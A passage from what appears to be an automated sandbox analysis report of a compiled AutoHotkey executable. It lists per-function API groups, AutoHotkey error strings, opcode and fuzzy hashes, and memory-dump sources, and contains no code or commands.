                                                                                                                                                                              • Opcode Fuzzy Hash: 98a24de7ba55c04d38065658e27677ee63340f0f86d4fce66029148b24d1cf15
                                                                                                                                                                              • Instruction Fuzzy Hash: 14319E366017428AEB7B8F2BE4547EA33A0F359784F544119EF4607FA8DB39C995CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$Create$DeleteFontText$CapsDeviceFaceIconInfoMetricsRectSelectStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 254724913-865373369
                                                                                                                                                                              • Opcode ID: 7afd9e268ae29a1e7efee5f73faa62c3cba9efffba365e9c5618ee78d223786d
                                                                                                                                                                              • Instruction ID: 4345f1b29b508bf8388c2995e996e58980ec9e0b9e9d11ded086e5af7502f2b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 7afd9e268ae29a1e7efee5f73faa62c3cba9efffba365e9c5618ee78d223786d
                                                                                                                                                                              • Instruction Fuzzy Hash: B431AE326057818AEB2B8F26E4547EE33A1F35D784F144119EF4A07FA4DB39C595CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$Create$DeleteFontText$CapsDeviceFaceIconInfoMetricsRectSelectStock
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 254724913-865373369
                                                                                                                                                                              • Opcode ID: e4788aac5e069e6f57218dc2d0fd88ef01557d6888c885dd40041b05e3ed4454
                                                                                                                                                                              • Instruction ID: 7ee0e317a325b17f37c135734ea546defc8fbd34a4e416b1f4aed8d9820c1a9d
                                                                                                                                                                              • Opcode Fuzzy Hash: e4788aac5e069e6f57218dc2d0fd88ef01557d6888c885dd40041b05e3ed4454
                                                                                                                                                                              • Instruction Fuzzy Hash: 58316D32601B428AEB6A8F26A4547EA33A1F359B84F144219EF5A07FE4DB39C595CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                              • String ID: %s\$:$C:\Users\user\Desktop
                                                                                                                                                                              • API String ID: 1611563598-1530560589
                                                                                                                                                                              • Opcode ID: 7629f040e34234f63d2b5128c6bbb84deb6c40e1d0e963b3b1296bb795920d50
                                                                                                                                                                              • Instruction ID: f190399a93cb8091d0ff56b95319e99007c23e63b8c22ae9d14a1bb3073ecb65
                                                                                                                                                                              • Opcode Fuzzy Hash: 7629f040e34234f63d2b5128c6bbb84deb6c40e1d0e963b3b1296bb795920d50
                                                                                                                                                                              • Instruction Fuzzy Hash: C121F4B1B0828041FB639B33EE543EE63A0AB5DBD4F445125AB54476F5DBBCC185C318
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1235662423-0
                                                                                                                                                                              • Opcode ID: 9911b2e64664ce16936b66a1e959905f494cb035cf5cbc359ce5ae1c363b0b1f
                                                                                                                                                                              • Instruction ID: b2cdfd3e1a51a8f5ad414e798f89a061ef4449d98d175c90307e114efbd1bcf8
                                                                                                                                                                              • Opcode Fuzzy Hash: 9911b2e64664ce16936b66a1e959905f494cb035cf5cbc359ce5ae1c363b0b1f
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E71BE7220468082F772AB16E4547EA77A1F78DBE6F505211EBA607AF4DBBCC582C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$ButtonCheckedClientRect$Screen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 661090996-0
                                                                                                                                                                              • Opcode ID: 61cf0e7a1b81c53e02c7ac5281ee6b5b3938de98cadc65529b9d5f19875b0010
                                                                                                                                                                              • Instruction ID: cbf3b4413ceb655f820b546c70f3d299f71cebd80e11265ea6567cace6227467
                                                                                                                                                                              • Opcode Fuzzy Hash: 61cf0e7a1b81c53e02c7ac5281ee6b5b3938de98cadc65529b9d5f19875b0010
                                                                                                                                                                              • Instruction Fuzzy Hash: E9213E36609A4087D765CF2AE59079EB3A0F79CBD0F449125EB9A83BA8DF3CC555CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <<>>$Memory limit reached (see #MaxMem in the help file).$Out of memory.
                                                                                                                                                                              • API String ID: 0-651194365
                                                                                                                                                                              • Opcode ID: bfd6390ade72c9ca1e81ae5f2987559ccaec4fa7611cf776e3d8b13f720f7e4d
                                                                                                                                                                              • Instruction ID: af184017a8ee0f077e616a32eab505d1a79bee8366cff1e49cf33c2afaf683f9
                                                                                                                                                                              • Opcode Fuzzy Hash: bfd6390ade72c9ca1e81ae5f2987559ccaec4fa7611cf776e3d8b13f720f7e4d
                                                                                                                                                                              • Instruction Fuzzy Hash: 24E19C72204B9081EA22CB22E8403E967AAF75DBD4F640A16EB9D17FF5DF78C556C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                              • Opcode ID: b7da6e54634a613febdc7499532ee12609ae9a6a20d4f56ebca04d00fb875e8d
                                                                                                                                                                              • Instruction ID: 9e13947ad5bdadd436d079845afac873d090fb7dfab2e257797636c42161331e
                                                                                                                                                                              • Opcode Fuzzy Hash: b7da6e54634a613febdc7499532ee12609ae9a6a20d4f56ebca04d00fb875e8d
                                                                                                                                                                              • Instruction Fuzzy Hash: 69C1BC72204F8486EB728FA794503EE6BB1B798BD0F954115BB4A077B6CBB8CA418705
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateErrorLastValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3352405036-0
                                                                                                                                                                              • Opcode ID: 1ece1753be697b0ba6ea9dcd980881db14879e0d5350af68fe415455737ac268
                                                                                                                                                                              • Instruction ID: e837a2369f46627509b9c769784b970d282cd45b819b397eab675bc70467dc9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 1ece1753be697b0ba6ea9dcd980881db14879e0d5350af68fe415455737ac268
                                                                                                                                                                              • Instruction Fuzzy Hash: 26A1A07260878485EB729F26E4407EA77A1F788BE0F946215FB5943BF5DF38C6458B00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ComObjType
                                                                                                                                                                              • API String ID: 0-2003225836
                                                                                                                                                                              • Opcode ID: 9276b20c02cd6607505767123e374fc801ac9fff56921a5e2674b1b9ae3aaea5
                                                                                                                                                                              • Instruction ID: 262d667ae990571d154d7b3f1097be2b7a672fba3a2605e6db44d3ff6a401b86
                                                                                                                                                                              • Opcode Fuzzy Hash: 9276b20c02cd6607505767123e374fc801ac9fff56921a5e2674b1b9ae3aaea5
                                                                                                                                                                              • Instruction Fuzzy Hash: 36917B72204B4082EB56DF26E8543AE77A2F789BC4F118925EB4E477B4DF39C546C780
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked
                                                                                                                                                                              • String ID: Col
                                                                                                                                                                              • API String ID: 1719414920-737980560
                                                                                                                                                                              • Opcode ID: 4fbabe91d4fd1daac4ec899add2c67dec4388ba49a3b8a1dc4f21495de06c991
                                                                                                                                                                              • Instruction ID: f379b3b42463a38931f8fe8274df119777f03e3c4da839d50488815a9d8095bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fbabe91d4fd1daac4ec899add2c67dec4388ba49a3b8a1dc4f21495de06c991
                                                                                                                                                                              • Instruction Fuzzy Hash: D751BC32204B4195FB62DB67A4847E973A0F78DBD1F948121FF5A87BE4DA3AC941C300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %.*s.Get%s$Duplicate declaration.$Missing "]"$Not a valid method, class or property definition.$Out of memory.
                                                                                                                                                                              • API String ID: 0-1119647260
                                                                                                                                                                              • Opcode ID: 30543d4d50e45b27abc8b651abc9ec850dc7432be55ea237291b2cec81e0529f
                                                                                                                                                                              • Instruction ID: b4d8e0e3d4aa16ea581e12d6222c4481d55b3ae242e9f6f9aaba089aa71baa8c
                                                                                                                                                                              • Opcode Fuzzy Hash: 30543d4d50e45b27abc8b651abc9ec850dc7432be55ea237291b2cec81e0529f
                                                                                                                                                                              • Instruction Fuzzy Hash: 4451BF32600A8081FB62AB5BE4003E967A1E75CBD4F848126FF4D577F5EB38C996C341
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick
                                                                                                                                                                              • String ID: <<>>$MZ@
                                                                                                                                                                              • API String ID: 536389180-2574836979
                                                                                                                                                                              • Opcode ID: ea37e02fed2d5afe7ddbbf884b4bd9f90112de5e3ea19ca33ef385fb10839d6a
                                                                                                                                                                              • Instruction ID: be6f4c31223da8cf9c46c11ae00ee9d3f4017d8d6ab25a0c9dede99871355013
                                                                                                                                                                              • Opcode Fuzzy Hash: ea37e02fed2d5afe7ddbbf884b4bd9f90112de5e3ea19ca33ef385fb10839d6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 596139B5204B8486E723DB27F8803DA77A1B78CBD4F444125EB9947AB6DB7CC555C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 190572456-2978689999
                                                                                                                                                                              • Opcode ID: ceba81021bf5831b0e3ae711eece23b613db937a541ba99b4eb189774613d777
                                                                                                                                                                              • Instruction ID: 6a9c051ef04e1f91cfc8a815b26d513be8ac348aa81f8e0978f322eb574e6ca8
                                                                                                                                                                              • Opcode Fuzzy Hash: ceba81021bf5831b0e3ae711eece23b613db937a541ba99b4eb189774613d777
                                                                                                                                                                              • Instruction Fuzzy Hash: 4441F772305E0091FE279F87A8147E663A5B70CBE0F294529BF294B7A4DE3CC4449740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              • call, xrefs: 000000014000C1DB
                                                                                                                                                                              • %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file), xrefs: 000000014000C103
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$MessagePost
                                                                                                                                                                              • String ID: %u hotkeys have been received in the last %ums.Do you want to continue?(see #MaxHotkeysPerInterval in the help file)$call
                                                                                                                                                                              • API String ID: 1796604469-3729902611
                                                                                                                                                                              • Opcode ID: 2c862204fdc55614bd57a39d1f6199da74ce8280ebae622f806b7ffb40ea7368
                                                                                                                                                                              • Instruction ID: c78dff425b4484b3d511f7240cc07ec946b34894d9b8a0f45abac12286780ecf
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c862204fdc55614bd57a39d1f6199da74ce8280ebae622f806b7ffb40ea7368
                                                                                                                                                                              • Instruction Fuzzy Hash: F6519EB261568086F767DB67F890BDA77A1E79EBC4F004116EB8943E75DBB8C480DB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Attributes$FullNamePath$CreateDirectoryErrorLastOperation
                                                                                                                                                                              • String ID: \
                                                                                                                                                                              • API String ID: 3088001423-2967466578
                                                                                                                                                                              • Opcode ID: 75055c802185946d9b41c85bb4dd37f66d1ab0eab66ddf84916e49df4edeeef7
                                                                                                                                                                              • Instruction ID: e822dc4c13cfd005984962f79b3f13831c62ab0ed47445a18235923ea718076b
                                                                                                                                                                              • Opcode Fuzzy Hash: 75055c802185946d9b41c85bb4dd37f66d1ab0eab66ddf84916e49df4edeeef7
                                                                                                                                                                              • Instruction Fuzzy Hash: B4518F36104B8095DB628F26E8403EAB3B1F798794FA84615FB5D537F4EB39C68AC700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
